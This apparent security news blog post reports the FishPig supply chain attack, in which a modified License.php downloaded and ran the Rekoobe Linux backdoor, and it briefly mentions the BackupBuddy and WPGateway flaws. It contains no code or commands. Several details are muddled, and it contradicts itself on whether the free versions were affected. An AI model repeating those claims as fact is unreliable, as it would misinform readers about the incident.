WordPress Powered Sites Backdoored after FishPig Supply Chain Attack
Reading Time: 2 minutes

WordPress powered sites backdoored after FishPig supply chain attack. FishPig is a UK based software creator that integrates Adobe’s Magento ecommerce suite into WordPress-powered websites. The installation of their products has been hacked, and the downloaded content consists of a Rekoobe Linux Trojan that installs automatically.

There are at least three critical holes in WordPress plugins and tools that are being exploited in the wild right now on numerous websites.

According to the Sansec cybersecurity team, this week FishPig’s software opened up a backdoor by fetching an executable shell script. It turns out, the program was Rekoobe, and it would let anyone with access to the server remotely control the machine.

This enabled the bad actors to pry on customers, alter or steal data, and so on.

FishPig posted on their website, the company found code changes though back in August and removed it. Primarily the paid versions of the software were affected, while the free versions of FishPig modules available on GitHub remain clean. 

FishPig’s commercial software users have been advised to reinstall the tools and check for signs of compromise.

FishPig’s supply-chain attack, it’s not clear how many people were affected, but 200,000 downloads suggests there was a lot of interest in what their company had to offer.

The License.php file on FishPig’s systems was modified to download and execute a malicious binary hosted on FishPig’s platform, generating a program named Rekoobe. As a result, when employees use the License.php file to access their FishPig deployment’s control panel, it automatically runs the harmful program and infects their web server.

License.php is routinely referenced since it is used to ensure the deployment is appropriately paid for and licensed

Rekoobe is a malware that originated from a single IP address located in Latvia. Once infected, it removes valuable files and resides in the system’s memory. It then sends commands to someone who hacked a supply chain system and sells access to the information compromised on it.

Rekoobe was found as early as 2015 and has been floating around the internet. This variant of Rekoobe was written no earlier than 2018, and Intezer has discovered that it appears to have been written by a pet project of an unknown person with Russian language skills.

Intezer found that newer versions of Rekoobe are hard-coded with C2 addresses and randomly renamed the process to fool security analysts.

The company’s free and paid offerings have been affected by the breach. If you’re not sure, get in touch for a free clean up service.

A plugin on WordPress called BackupBuddy was found to have a vulnerability, which can be exploited for malicious reasons.

Wordfence this week warned of a zero-day security hole in a plugin called WPGateway being exploited to add malicious administrator accounts to vulnerable websites. We are not aware of a patch being available at the moment, but we will update the article when one is.

Related Articles:
Webworm Hackers Use Modified RATs in Latest Cyber Espionage Attacks
Malware Attacks Targeting Gamers Increase in 2022
SparklingGoblin APT Hackers Use New Linux Variant of SideWalk Backdoor